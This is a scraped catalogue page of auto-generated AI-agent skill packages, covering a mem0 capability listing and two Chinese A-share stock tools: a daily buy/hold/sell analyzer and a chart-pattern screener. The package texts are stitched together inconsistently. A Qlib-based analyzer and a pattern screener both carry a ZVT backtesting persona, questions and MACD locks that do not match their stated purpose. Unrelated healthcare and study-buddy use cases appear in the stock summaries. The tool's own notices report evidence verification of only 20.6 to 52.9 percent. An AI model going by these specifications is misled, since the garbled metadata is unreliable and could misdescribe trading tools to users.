          short_description: Write to the same memory store from multiple different LLMs (e.g
          sample_triggers:
          - multi-LLM
          - memory writing
          - extraction comparison
        - uc_id: UC-011
          name: Self-Hosted vLLM with mem0
          short_description: Run mem0 fully self-hosted with vLLM as the LLM provider — air-gapped reference implementation
          sample_triggers:
          - vLLM
          - self-hosted LLM
          - air-gapped
        - uc_id: UC-015
          name: OpenAI Built-in Tools + mem0
          short_description: Combine OpenAI Assistants API built-in tools (file_search, code_interpreter, etc.) with mem0
            memory layer
          sample_triggers:
          - OpenAI Assistants
          - built-in tools
          - file_search
        - uc_id: UC-017
          name: Graph DB Demos (Neo4j / Memgraph / Kuzu / Neptune notebooks)
          short_description: Notebook demonstrations of how to layer graph databases on TOP of mem0 — these are NOT graph
            integration inside the OSS SDK (see BD-026); the notebook
          sample_triggers:
          - graph DB
          - Neo4j
          - Memgraph
        - uc_id: UC-020
          name: AutoGen "Teachability" Capability Adapter
          short_description: Adapter that exposes mem0 as an AutoGen "Teachability" capability so AutoGen agents can learn
            from corrections
          sample_triggers:
          - AutoGen
          - Teachability
          - corrections learning
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try personal ai assistant with image+text memory (agno)
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try ai study buddy with spaced repetition
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try healthcare assistant (google adk)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 21 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Healthcare Assistant (Google ADK)
    - AI Study Buddy with Spaced Repetition
    - Personal AI Assistant with Image+Text Memory (agno)
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Daily Stock Analyzer

Skill

基于 Qlib 的 A 股自选股智能分析系统，集成 LLM Agent ReAct 推理引擎和技术指标择时模块（MA 多头排列、乖离率阈值严进策略），自动生成每日 buy/hold/sell 指令并推送至微信。触发场景：(1) 用户要查询自选股当天的 AI 交易信号和涨跌预测；(2) 用户要获取符合 MA 多头排...

---
name: daily-stock-analyzer
description: |-
  基于 Qlib 的 A 股自选股智能分析系统，集成 LLM Agent ReAct 推理引擎和技术指标择时模块（MA 多头排列、乖离率阈值严进策略），自动生成每日 buy/hold/sell 指令并推送至微信。触发场景：(1) 用户要查询自选股当天的 AI 交易信号和涨跌预测；(2) 用户要获取符合 MA 多头排列且乖离率低于 5% 的可买入股票列表；(3) 用户要在收盘后自动接收个股的买卖建议和持仓诊断报告。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-004"
  compiled_at: "2026-04-22T11:38:26.686045+00:00"
  capability_markets: "unspecified"
  capability_activities: "finance-analytics"
  sop_version: "crystal-compilation-v6.1"
---
# daily-stock-analyzer

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (9 total)

### A股自选股智能分析系统主调度 (`UC-101`)
协调各模块完成股票分析流程，实现低并发的线程池调度，全局异常处理确保单股失败不影响整体分析任务
**Triggers**: 股票分析, 调度, 线程池

### RESTful API 后端服务 (`UC-102`)
提供RESTful API服务支持CORS跨域访问，同时托管前端静态文件用于生产环境部署
**Triggers**: API服务, 后端, FastAPI

### LLM Agent ReAct执行循环 (`UC-103`)
提供LLM Agent的ReAct执行循环，支持可插拔的进度回调、消息历史和结果处理，实现工具调用与LLM推理的迭代执行
**Triggers**: LLM Agent, ReAct, 工具调用

For all **9** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-004. Evidence verify ratio = 52.9% and audit fail total = 25. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 0 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-004` blueprint at 2026-04-22T11:38:26.686045+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['LLM Agent ReAct执行循环', 'RESTful API 后端服务', 'A股自选股智能分析系统主调度', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **0**

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-004--daily_stock_analysis
**Scan date**: 2026-04-22
**Stats**: {'total_files': 9, 'total_classes': 30, 'total_functions': 0, 'total_stages': 9}

## Modules (9)

- [data_collection_&_normalization](components/data_collection_-_normalization.md): 3 classes
- [technical_trend_analysis](components/technical_trend_analysis.md): 2 classes
- [multi-agent_pipeline_(react_+_llm)](components/multi-agent_pipeline_-react_-_llm.md): 4 classes
- [trading_skill_system](components/trading_skill_system.md): 4 classes
- [bot_messaging_&_command_dispatch](components/bot_messaging_-_command_dispatch.md): 4 classes
- [portfolio_management_&_risk](components/portfolio_management_-_risk.md): 4 classes
- [backtest_evaluation_engine](components/backtest_evaluation_engine.md): 3 classes
- [notification_dispatch](components/notification_dispatch.md): 2 classes
- [storage_&_persistence](components/storage_-_persistence.md): 4 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 149
  fatal_constraints_count: 38
  non_fatal_constraints_count: 238
  use_cases_count: 9
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **9**

## `KUC-101`
**Source**: `main.py`

协调各模块完成股票分析流程，实现低并发的线程池调度，全局异常处理确保单股失败不影响整体分析任务

## `KUC-102`
**Source**: `server.py`

提供RESTful API服务支持CORS跨域访问，同时托管前端静态文件用于生产环境部署

## `KUC-103`
**Source**: `src/agent/runner.py`

提供LLM Agent的ReAct执行循环，支持可插拔的进度回调、消息历史和结果处理，实现工具调用与LLM推理的迭代执行

## `KUC-104`
**Source**: `src/notification_sender/serverchan3_sender.py`

通过Server酱3 API推送分析结果提醒消息到用户终端，支持标题和内容自定义

## `KUC-105`
**Source**: `scripts/check_ai_assets.py`

验证AI Agent的指令文件和技能配置是否完整，包括AGENTS.md、CLAUDE.md、Copilot配置和skill目录结构

## `KUC-106`
**Source**: `scripts/generate_index_from_csv.py`

从CSV文件（Tushare格式或AkShare格式）生成股票索引JSON文件，用于前端自动补全功能，支持中文名称转拼音

## `KUC-107`
**Source**: `scripts/generate_stock_index.py`

从内存中的STOCK_NAME_MAP生成股票索引文件用于前端自动补全，采用两阶段策略（先用映射表，后续结合AkShare）

## `KUC-108`
**Source**: `scripts/fetch_tushare_stock_list.py`

从Tushare Pro API获取A股、港股、美股列表信息并保存为CSV文件，支持按市场分类导出

## `KUC-109`
**Source**: `test_env.py`

验证系统环境配置是否正确，包括.env配置加载、数据库连接、数据源API、LLM调用和通知推送功能的可用性测试

FILE:references/WISDOM.md
# Cross-Project Wisdom

Total: **0**

FILE:references/components/backtest_evaluation_engine.md
# backtest_evaluation_engine (3 classes)

## `BacktestEngine.evaluate`
`backtest_evaluation_engine/backtestengine-evaluate.py:0`

## `BacktestService.run_backtest`
`backtest_evaluation_engine/backtestservice-run-backtest.py:0`

## `Evaluation window`
`backtest_evaluation_engine/evaluation-window.py:0`

FILE:references/components/bot_messaging_-_command_dispatch.md
# bot_messaging_&_command_dispatch (4 classes)

## `CommandDispatcher.dispatch`
`bot_messaging_&_command_dispatch/commanddispatcher-dispatch.py:0`

## `BotCommand.execute`
`bot_messaging_&_command_dispatch/botcommand-execute.py:0`

## `Command`
`bot_messaging_&_command_dispatch/command.py:0`

## `Platform adapter`
`bot_messaging_&_command_dispatch/platform-adapter.py:0`

FILE:references/components/data_collection_-_normalization.md
# data_collection_&_normalization (3 classes)

## `DataFetcherManager.fetch_data`
`data_collection_&_normalization/datafetchermanager-fetch-data.py:0`

## `BaseFetcher.fetch`
`data_collection_&_normalization/basefetcher-fetch.py:0`

## `Data fetcher`
`data_collection_&_normalization/data-fetcher.py:0`

FILE:references/components/multi-agent_pipeline_-react_-_llm.md
# multi-agent_pipeline_(react_+_llm) (4 classes)

## `AgentOrchestrator.run`
`multi-agent_pipeline_(react_+_llm)/agentorchestrator-run.py:0`

## `run_agent_loop`
`multi-agent_pipeline_(react_+_llm)/run-agent-loop.py:0`

## `LLM provider`
`multi-agent_pipeline_(react_+_llm)/llm-provider.py:0`

## `Agent chain`
`multi-agent_pipeline_(react_+_llm)/agent-chain.py:0`

FILE:references/components/notification_dispatch.md
# notification_dispatch (2 classes)

## `NotificationManager.send`
`notification_dispatch/notificationmanager-send.py:0`

## `Notification channel`
`notification_dispatch/notification-channel.py:0`

FILE:references/components/portfolio_management_-_risk.md
# portfolio_management_&_risk (4 classes)

## `PortfolioService.snapshot`
`portfolio_management_&_risk/portfolioservice-snapshot.py:0`

## `PortfolioRiskService.generate_report`
`portfolio_management_&_risk/portfolioriskservice-generate-report.py:0`

## `Cost method`
`portfolio_management_&_risk/cost-method.py:0`

## `FX rate source`
`portfolio_management_&_risk/fx-rate-source.py:0`

FILE:references/components/storage_-_persistence.md
# storage_&_persistence (4 classes)

## `DatabaseManager.save_daily_data`
`storage_&_persistence/databasemanager-save-daily-data.py:0`

## `DatabaseManager.has_today_data`
`storage_&_persistence/databasemanager-has-today-data.py:0`

## `DatabaseManager.record_llm_usage`
`storage_&_persistence/databasemanager-record-llm-usage.py:0`

## `Database backend`
`storage_&_persistence/database-backend.py:0`

FILE:references/components/technical_trend_analysis.md
# technical_trend_analysis (2 classes)

## `StockTrendAnalyzer.analyze`
`technical_trend_analysis/stocktrendanalyzer-analyze.py:0`

## `Analysis algorithm`
`technical_trend_analysis/analysis-algorithm.py:0`

FILE:references/components/trading_skill_system.md
# trading_skill_system (4 classes)

## `SkillManager.get_skill_instructions`
`trading_skill_system/skillmanager-get-skill-instructions.py:0`

## `SkillRouter.route`
`trading_skill_system/skillrouter-route.py:0`

## `SkillAggregator.aggregate`
`trading_skill_system/skillaggregator-aggregate.py:0`

## `Skill bundle`
`trading_skill_system/skill-bundle.py:0`

ClawHub Backend Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Stock Pattern Screener

Skill

使用7种技术形态检测器（杯柄、三周紧绑、高紧旗、VCP、NR7等）按确定性顺序扫描股票池，支持跨检测器评分校准与置信度聚合排序。

---
name: stock-pattern-screener
description: |-
  使用7种技术形态检测器（杯柄、三周紧绑、高紧旗、VCP、NR7等）按确定性顺序扫描股票池，支持跨检测器评分校准与置信度聚合排序。
license: Proprietary. See LICENSE.txt in project root.
compatibility: Designed for Doramagic-host ecosystem (Claude Code / openclaw / Cursor). Requires Python 3.12+ with uv package manager.
metadata:
  version: "v6.1"
  blueprint_id: "finance-bp-082"
  compiled_at: "2026-04-22T13:00:32.580572+00:00"
  capability_markets: "unspecified"
  capability_activities: "finance-analytics"
  sop_version: "crystal-compilation-v6.1"
---
# 股票形态筛选 (stock-pattern-screener)

> 使用7种技术形态检测器（杯柄、三周紧绑、高紧旗、VCP、NR7等）按确定性顺序扫描股票池，支持跨检测器评分校准与置信度聚合排序。

## Pipeline

`data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization`

## Top Use Cases (30 total)

### FastAPI Application Bootstrap (`UC-001`)
Provides the main FastAPI application entry point with CORS middleware, dependency injection wiring, and runtime service initialization for the Hermes
**Triggers**: api, server, start

### Server Authentication Service (`UC-005`)
Provides single-user server authentication helpers including token encoding, decoding, expiration checking, and HMAC signature validation for securing
**Triggers**: auth, authentication, token

### Setup Engine Pattern Detection (`UC-014`)
Detects chart patterns (VCP, Cup-with-Handle, NR7, etc.) using normalized scoring and cross-detector calibration for trade setup quality assessment
**Triggers**: setup, pattern, vcp

For all **30** use cases, see [references/USE_CASES.md](references/USE_CASES.md).

**Execute trigger**: `When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)`

## What I'll Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Semantic Locks (Fatal)

| ID | Rule | On Violation |
|---|---|---|
| `SL-01` | Execute sell orders before buy orders in every trading cycle | halt |
| `SL-02` | Trading signals MUST use next-bar execution (no look-ahead) | halt |
| `SL-03` | Entity IDs MUST follow format entity_type_exchange_code | halt |
| `SL-04` | DataFrame index MUST be MultiIndex (entity_id, timestamp) | halt |
| `SL-05` | TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount | halt |
| `SL-06` | filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION | halt |
| `SL-07` | Transformer MUST run BEFORE Accumulator in factor pipeline | halt |
| `SL-08` | MACD parameters locked: fast=12, slow=26, signal=9 | halt |

Full lock definitions: [references/LOCKS.md](references/LOCKS.md)

## Evidence Quality Notice

> [QUALITY NOTICE] This crystal was compiled from blueprint finance-bp-082. Evidence verify ratio = 20.6% and audit fail total = 13. Generated results may have uncaptured requirement gaps. Verify critical decisions against source files (LATEST.yaml / LATEST.jsonl).

## Reference Files

| File | Contents | When to Load |
|---|---|---|
| [references/seed.yaml](references/seed.yaml) | V6+ 全量权威 (source-of-truth) | 有行为/决策争议时必读 |
| [references/ANTI_PATTERNS.md](references/ANTI_PATTERNS.md) | 0 条跨项目反模式 | 开始实现前 |
| [references/WISDOM.md](references/WISDOM.md) | 跨项目精华借鉴 | 架构决策时 |
| [references/CONSTRAINTS.md](references/CONSTRAINTS.md) | domain + fatal 约束 | 规则冲突时 |
| [references/USE_CASES.md](references/USE_CASES.md) | 全量 KUC-* 业务场景 | 需要完整示例时 |
| [references/LOCKS.md](references/LOCKS.md) | SL-* + preconditions + hints | 生成回测/交易代码前 |
| [references/COMPONENTS.md](references/COMPONENTS.md) | AST 组件地图（按 module 拆分）| 查 API 时 |

---

*Compiled by Doramagic crystal-compilation-v6.1 from `finance-bp-082` blueprint at 2026-04-22T13:00:32.580572+00:00.*
*See [human_summary.md](human_summary.md) for non-technical overview.*

FILE:human_summary.md
# Human Summary

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- **tagline**: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)
- **use_cases**: ['Legacy Runtime Database Migration', 'XUI-Reader CLI Workflows', 'FastAPI Application Bootstrap', 'A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney', 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader', 'Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout', 'Index composition data collection (SZ1000, SZ2000) with EM recorder']

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

FILE:references/ANTI_PATTERNS.md
# Anti-Patterns (Cross-Project)

Total: **0**

FILE:references/COMPONENTS.md
# Component Capability Map

**Project**: finance-bp-082--stock-screener
**Scan date**: 2026-04-22
**Stats**: {'total_files': 7, 'total_classes': 37, 'total_functions': 0, 'total_stages': 7}

## Modules (7)

- [data_collection_layer](components/data_collection_layer.md): 5 classes
- [screening_execution_layer](components/screening_execution_layer.md): 5 classes
- [pattern_detection_layer_(setup_engine)](components/pattern_detection_layer_-setup_engine.md): 6 classes
- [scoring_and_rating_layer](components/scoring_and_rating_layer.md): 5 classes
- [persistence_layer](components/persistence_layer.md): 5 classes
- [api_layer](components/api_layer.md): 6 classes
- [cache_infrastructure](components/cache_infrastructure.md): 5 classes

FILE:references/CONSTRAINTS.md
# Constraints

## preservation_manifest

```yaml
required_objects:
  business_decisions_count: 182
  fatal_constraints_count: 44
  non_fatal_constraints_count: 274
  use_cases_count: 30
  semantic_locks_count: 12
  preconditions_count: 4
  evidence_quality_rules_count: 2
  traceback_scenarios_count: 5

```

FILE:references/LOCKS.md
# Semantic Locks + Preconditions

## Semantic Locks (12)

### `SL-01` <sub>(on_violation: fatal)</sub>
Execute sell orders before buy orders in every trading cycle

### `SL-02` <sub>(on_violation: fatal)</sub>
Trading signals MUST use next-bar execution (no look-ahead)

### `SL-03` <sub>(on_violation: fatal)</sub>
Entity IDs MUST follow format entity_type_exchange_code

### `SL-04` <sub>(on_violation: fatal)</sub>
DataFrame index MUST be MultiIndex (entity_id, timestamp)

### `SL-05` <sub>(on_violation: fatal)</sub>
TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount

### `SL-06` <sub>(on_violation: fatal)</sub>
filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION

### `SL-07` <sub>(on_violation: fatal)</sub>
Transformer MUST run BEFORE Accumulator in factor pipeline

### `SL-08` <sub>(on_violation: fatal)</sub>
MACD parameters locked: fast=12, slow=26, signal=9

### `SL-09` <sub>(on_violation: warning)</sub>
Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001

### `SL-10` <sub>(on_violation: fatal)</sub>
A-share equity trading is T+1 (no same-day close of buy positions)

### `SL-11` <sub>(on_violation: fatal)</sub>
Recorder subclass MUST define provider AND data_schema class attributes

### `SL-12` <sub>(on_violation: fatal)</sub>
Factor result_df MUST contain either 'filter_result' OR 'score_result' column

## Preconditions (4)

- **`PC-01`**: `python3 -c 'import zvt; print(zvt.__version__)'` → on_fail: Run: python3 -m pip install zvt then re-run: python3 -m zvt.init_dirs to initialize data directories
- **`PC-02`**: `python3 -c "from zvt.api.kdata import get_kdata; df = get_kdata(entity_ids=['stock_sh_600000'], limit=1); assert df is not None and len(df) > 0, 'No kdata found'"` → on_fail: Run recorder first: python3 -m zvt.recorders.em.em_stock_kdata_recorder --entity_ids stock_sh_600000 (replace with your target entity IDs)
- **`PC-03`**: `python3 -c "import os; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); assert zvt_home.exists(), f'ZVT home not found: {zvt_home}'"` → on_fail: Run: python3 -m zvt.init_dirs
- **`PC-04`**: `python3 -c "import os, tempfile; from pathlib import Path; zvt_home = Path(os.environ.get('ZVT_HOME', Path.home() / '.zvt')); test_f = zvt_home / '.write_test'; test_f.touch(); test_f.unlink()"` → on_fail: Check directory permissions: chmod u+w ~/.zvt or set ZVT_HOME environment variable to a writable location

FILE:references/USE_CASES.md
# Known Use Cases (KUC)

Total: **30**

## `KUC-001`
**Source**: `backend/app/main.py`

Provides the main FastAPI application entry point with CORS middleware, dependency injection wiring, and runtime service initialization for the Hermes Market Copilot backend.

## `KUC-002`
**Source**: `xui-reader/src/xui_reader/cli.py`

Provides a Typer-based CLI for authenticating with X (Twitter), managing browser sessions, and collecting social media data for theme discovery and sentiment analysis.

## `KUC-003`
**Source**: `backend/scripts/run_legacy_runtime_migrations.py`

Runs pre-Alembic schema reconciliation steps exactly once to migrate legacy runtime data structures to the current schema.

## `KUC-004`
**Source**: `backend/app/use_cases/scanning/run_bulk_scan.py`

Orchestrates the full bulk scan execution lifecycle including checkpoint-based resume support, chunk processing, progress reporting, and cancellation handling.

## `KUC-005`
**Source**: `backend/app/services/server_auth.py`

Provides single-user server authentication helpers including token encoding, decoding, expiration checking, and HMAC signature validation for securing API endpoints.

## `KUC-006`
**Source**: `backend/app/interfaces/mcp/server.py`

Provides a minimal stdio MCP (Model Context Protocol) server for integrating the Hermes Market Copilot with external AI agents via JSON-RPC messaging.

## `KUC-007`
**Source**: `backend/tests/unit/test_universe_resolver_asia_indices.py`

Resolves index-based universes (HSI, NIKKEI225, TAIEX) to constituent symbols for targeted Asian market scanning.

## `KUC-008`
**Source**: `backend/tests/unit/test_watchlist_import_service.py`

Parses and deduplicates symbols from text, CSV, or tab-delimited watchlist imports for stock screening.

## `KUC-009`
**Source**: `backend/tests/unit/test_market_hours.py`

Provides utilities for detecting trading days, checking market open/close times, and managing NYSE calendar integration across US and Asian markets.

## `KUC-010`
**Source**: `backend/tests/unit/test_minervini_scanner.py`

Implements the Minervini trend template screening strategy for identifying growth stocks in strong uptrends with market cap, price, and volume criteria.

## `KUC-011`
**Source**: `backend/tests/unit/test_canslim_scanner.py`

Implements the CANSLIM screening strategy combining current earnings, annual earnings, new products/management, supply/demand, market direction, and leader/laggard analysis.

## `KUC-012`
